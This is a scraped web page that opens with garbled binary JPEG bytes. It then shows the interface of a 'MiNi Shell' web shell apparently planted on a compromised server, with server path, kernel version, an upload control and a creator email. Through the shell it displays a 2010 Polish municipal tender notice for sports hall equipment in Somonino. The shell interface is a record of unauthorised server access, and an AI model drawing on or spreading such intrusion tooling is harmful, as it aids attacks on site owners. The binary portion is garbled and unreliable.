JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100728/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100728/227464-N-2010.html

<p class="kh_header"><b>Somonino: Dostawa wyposażenia hali rehabilitacyjno - sportowej w Somoninie</b><br>
<b>Numer ogłoszenia: 227464 - 2010; data zamieszczenia: 28.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Somonino , ul. Ceynowy, 83-314 Somonino, woj. pomorskie, tel. 058 6841121, faks 058 6841144.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.somonino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia hali rehabilitacyjno - sportowej w Somoninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:

1.	URZĄDZENIA SPORTOWE

1.1 PIŁKOCHWYTY NA ŚCIANY SZCZYTOWE							         	       
Siatka ochronna na ścianę szczytową polipropylenowa z obciążeniem dolnej krawędzi 
o wymiarach  4 x 22 m x 2 szt, oczka 50 x 50 mm i o wymiarach  3,7x 22 m x 2 szt, 
oczka 100 x 100 mm grubość splotu  2 - 3 mm, kolor zielony		                             - 338,8 m2 
Elementy montażowe-wsporniki, olinowanie, karabińczyki teflonowe wraz z montażem  - 338,8 m2					  
1.2	KOTARY  GRODZĄCE

Kotara grodząca tkanina + siatka o wymiarach 7,7 x 20 m do wysokości 
3 m materiał przezroczysty, powyżej siatka o oczkach 10 x 10 cm, koloru zielonego            - 308 m2  Konstrukcja do pionowego podnoszenia i opuszczania kotary z napędem elektrycznym 
wraz z montażem 					                                               - 2 kpl.     

1.3 DRABINKI GIMNASTYCZNE  H = 3 m, mocowane pomiędzy filarami

Drabinki gimnastyczne podwójne przyścienne 180 x 300 cm - 		                - 16 szt   
montaż wraz  z elementami montażowymi				                              - 16 szt  
Drabinki gimnastyczne pojedyncze przyścienne 90 x 300 cm - 		                -   8 szt   
montaż wraz  z elementami montażowymi				                               -   8 szt   

1.4 PROFESJONALA TABLICA WYNIKÓW  SPORTOWYCH  - DTC 160 Profi

Tablica wyników sportowych DTS 160 Profi wymiary 220 x 125 x 10 cm, 
sterowanie przewodowe, tablica główna (zegar -czas, wynik, set/połowa, 
stan  setów/fauli, syrena), 2 osobne zegary 24 sek 50 x 40 x 10 cm, 
pulpit sterowniczy + 2 manipulatory, wysokość cyfr 220 i 125 mm - widoczność 60 m         - 1 kpl. 
 montaż							                                                 - 1 kpl.  		 
2.	WYPOSAŻENIE BOISK  GŁÓWNYCH



2.1 BOISKO  GŁÓWNE  - PIŁKA RĘCZNA

Bramki do piłki ręcznej profesjonalne aluminiowe (2x3m) z łukami składanymi	             - 1 para      
Siatki do piłki ręcznej turniejowej z piłkochwytem grubość splotu siatki 4-5mm	             - 1 para     
Zestaw talerzyków do mocowania bramek na posadzce hali sportowej		                        - 1 zestaw  
montaż             						                                                    - 1 zestaw  

2.2 BOISKO  GŁÓWNE - SIATKÓWKA

Profesjonalne aluminiowe słupy  do siatkówki o profilu owalnym wielofunkcyjne z 
naciągiem wewnętrznym blokowanym mimośrodowo z płynną regulacją wysokości 
siatki  (możliwość gry w tenisa) korba składana w słupku	                                                      - 1 kpl.   
Tuleja uniwersalna aluminiowa				                                                      - 2 szt   
Rama podłogowa z deklem				                                                      -  2 szt    
Siatka do siatkówki turniejowej z antenkami, obszyta z czterech stron taśmą	                           - 1 szt   
Wieszak na siatkę							                           - 1 szt   
Stanowisko sędziowskie z regulacją wysokości podestu, oparcie i podstawka do pisania	             - 1 szt    
Profesjonalne osłony słupków do siatkówki (gr 5 cm pokryta skadenem
na konstrukcji wzmacniającej) zapinana na rzepy			                                         - 1 kpl.  
montaż tulei						                                                       - 1 kpl.   							     	             
2.3 BOISKO  GŁÓWNE - KOSZYKÓWKA

Konstrukcja podwieszana z napędem elektrycznym 				                          - 2 szt   
Mechanizm regulacji wysokości tablicy 105 x 180 cm w zakresie 305 - 260 cm		            - 2 szt   
Tablica do koszykówki profesjonalna, szkło akrylowe o wymiarach 105 x 180 cm 
o grubości 15 mm, na ramie metalowej					                          - 2 szt   
Osłona dolnej krawędzi tablicy 105 x 180 cm					            - 2 szt  
Obręcz do koszykówki uchylna z siłownikami gazowymi				            - 2 szt   
Siatka do obręczy turniejowa, sznur 5 mm					                           - 2 szt 
montaż								                                         - 2 szt    

3.	WYPOSAŻENIE BOISK  TRENINGOWYCH		

3.1  3 x  BOISKA TRENINGOWE - KOSZYKÓWKA

Konstrukcja do koszykówki uchylna składana w bok na ścianę, 
wysięg 120 cm, mocowana między filarami za pomocą konstrukcji adaptacyjnej 	           - 6 szt   
Mechanizm regulacji wysokości tablicy 105 x 180 cm w zakresie 305 - 260 cm		           - 6 szt   
Profesjonalna tablica do koszykówki, szkło akrylowe o wymiarach 105 x 180 cm 
o grubości 10 mm, na ramie metalowej					                         - 6 szt    
Obręcz do koszykówki uchylna z siłownikami gazowymi				           - 6 szt   
Siatka do obręczy turniejowa, sznur 5 mm					                         - 6 szt   
montaż								                                       - 6 szt  

 3.2  2 x BOISKA TRENINGOWE - SIATKÓWKA

Profesjonalne aluminiowe słupki do siatkówki o profilu owalnym  wielofunkcyjne z 
naciągiem wewnętrznym blokowanym mimośrodowo z płynną regulacją wysokości siatki  (możliwość gry w tenisa) korba składana w słupku 	                                                                                              - 2 kpl.   
Tuleja uniwersalna aluminiowa						                        - 4 szt  
Rama podłogowa z deklem						                        - 4 szt  
Siatka do siatkówki czarna z antenką, wzmocniona taśmą				          - 2 szt   
Wieszak na siatkę							                        - 2 szt   
Profesjonalne osłony słupków do siatkówki (gr 5 cm pokryta skadenem 
na konstrukcji wzmacniające) zapinana na rzepy			                                      - 2 kpl.  
montaż tulei						                                                    - 2 kpl.   


4.	WYPOSAŻENIE DROBNE  HALI

Ławeczki gimnastyczne z nogami drewnianymi - długość 4 m		                         - 9 szt    
Liny do wspinania  L = 6 m					                	           - 4 szt    
Element mocujący linę							                         - 4 szt   
Montaż elementu do lin gimnastycznych					                         - 4 szt    
Drabinka sznurowa do wspinania L = 7 m					                         - 1 szt    
Element mocujący drabinkę sznurową					                          - 1 szt   
Montaż elementu do drabinki sznurowej					                         - 1 szt    
Lina do przeciągania L = 25 m						                         - 1 szt    
Odskocznia gimnastyczna profesjonalna					                         - 1 szt   
Skrzynia gimnastyczna 5-częściowa z wózkiem, pokryta skórą naturalną		           - 1 szt  
Kozioł gimnastyczny  z regulacją wysokości, pokrycie skórą		                                       - 1 kpl.   
Koń gimnastyczny  z regulacją wysokości w zakresie 110 - 170cm, z łękami, pokryty  skórą    - 1 kpl.   
Równoważnia gimnastyczna, długość 3 m, niska			                                       - 1 kpl.   
Materac gimnastyczny 200x120x5cm				                                       - 10 szt   
Materac gimnastyczny 200x120x10cm				                                        - 10 szt  
Stojak do skoku wzwyż  - szkolny					                                        - 1 kpl.
Poprzeczka do skoku wzwyż - aluminiowa					                          - 1 szt
Materac gimnastyczny zeskokowy antypoślizgowy o wymiarach 300 x 200 x 40 cm	            - 1 szt
Pokrowiec do materaca zeskokowego o wymiarach 300x 200 x 40 cm			            - 1 szt 
Stół do tenisa stołowego o wzmocnionym blacie na kółkach z osprzętem		            -.2 szt  
Profesjonalne osłony filarów drewnianych (gr 5 cm pokryta skadenem na konstrukcji 
wzmacniającej) montowanej na rzepy  o wymiarach wys. 250 głęb. 50, szer. 18	                          - 16 kpl.  
Drążek gimnastyczny - uniwersalny, wolnostojący 1 polowy z regulacją wysokości 
poprzeczki co 10 cm                                                                                                                         - 1 kpl.
Tuleja montażowa drążka gimnastycznego                                                                                      - 1 kpl.
Rama podłogowa z deklem                                                                                                               - 1 kpl.

5.	WYPOSAŻENIE SZATNI	

Ławko-wieszaki do szatni jednostronne 				                                          - 11 mb 
				
6.	WYPOSAŻENIE ZAPLECZA SPORTOWEGO
  
Biurko pod komputer o wymiarach 120 x 60 x 75 z szufladą oraz szafką z płyty laminowanej
w kolorze jasnego dębu						                                          - 1 szt      
Regał  90 x 210 x 35 z płyty laminowanej w kolorze jasnego dębu			              - 2 szt   
Szafa dwudrzwiowa  90 x 210 x 60 cm z płyty laminowanej w kolorze jasnego dębu	              - 1 szt      
Krzesła o konstrukcji metalowej z siedziskiem i oparciem tapicerowanym 		             - 4 szt    
Fotel obrotowy  tapicerowany 				   		                            - 1 szt   
Stolik 100 x 100 x 75 z płyty laminowanej w kolorze jasnego dębu			              - 1 szt     
Wózek na piłki przejezdny H=140cm, L=140cm, B=40cm				              - 1 szt   
Wózek na materace L=200cm, B=100cm					                            - 1 szt      
Kozetka lekarska                                                                                                                                - 1 szt	
Piłka nożna - szkolna Nr 5                                                                                                                - 20 szt  
Piłka do piłki ręcznej - szkolna Nr 2                                                                                                 - 20 szt  
Piłka do koszykówki - szkolna Nr 6                                                                                                  - 20 szt  
Piłka do siatkówki - szkolna Nr 5                                                                                                      - 20 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej   
ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach  
określonych w art. 67 ust.1 pkt 6 ustawy PZP. Wykonawca, któremu zostanie udzielone 
zamówienie podstawowe zobowiązany będzie do zastosowania w zamówieniach  
uzupełniających stawek, nie wyższych niż w zamówieniu podstawowym.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  5.000,- zł (słownie: pięćtysięcyzłotych 00-100).
2.	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego:
Bank Spółdzielczy Sztum O-Somonino - Nr  81830900000080010520000200
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
5.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Urząd Gminy w Somoninie, ul. Ceynowy 21, 83-314 Somonino w Punkcie Obsługi Interesanta lub zamieścić w osobnej kopercie - opisanej (wadium) dołączonej do oferty.
6.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie określa warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich pięciu lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie, co najmniej jednej dostawy sprzętu lub urządzeń sportowych o wartości minimum 200.000,- zł brutto (słownie:dwieścietysięcyzłotych), lub wykonał co najmniej jeden obiekt sportowy w którego zakresie była dostawa wyposażenia sportowego o wartości nie mniejszej niż 200.000,-</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie określa warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie określa warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże się posiadaniem środków finansowych lub zdolności kredytowej na kwotę co najmniej 200.000,00 zł oraz posiadaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 200.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualne atesty, cyrtyfikaty; świadectwa zgodności z wymogami bezpieczeństwa produktów i higieny użytkownika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Niedopuszczalne pod rygorem nieważności są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian o których mowa w ust. 2.
2.	Zmiany w umowie mogą dotyczyć:
1)	terminu wykonania zamówienia,
2)	wysokości wynagrodzenia Wykonawcy,
3.	Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1)	przerwy realizacji zamówienia na skutek działań podmiotów trzecich, np. , z przyczyn niezawinionych przez Wykonawcę lub Podwykonawcę.
2)	czasowego wstrzymania dostaw przez Zamawiającego.
4.	Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku zmiany stawki podatku VAT.
5.	Warunki dokonywania zmian:
1)	uzasadnienie konieczności i wpływu zmian na realizację zamówienia,
2)	w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
6.	 Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
1)	zmianę rachunku bankowego,
2)	zmiany adresowe.
7.	 Strony zobowiązane są do wzajemnego powiadomienia się na piśmie o zmianach, o których mowa w ust. 6.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.somonino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Somoninie, ul. Ceynowy 21, 83-314 Somonino, pok. Nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2010 godzina 11:00, miejsce: Punkt Obsługi Interesanta w Urzędzie Gminy w Somoninie, ul. Ceynowy 21, 83-314 Somonino..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com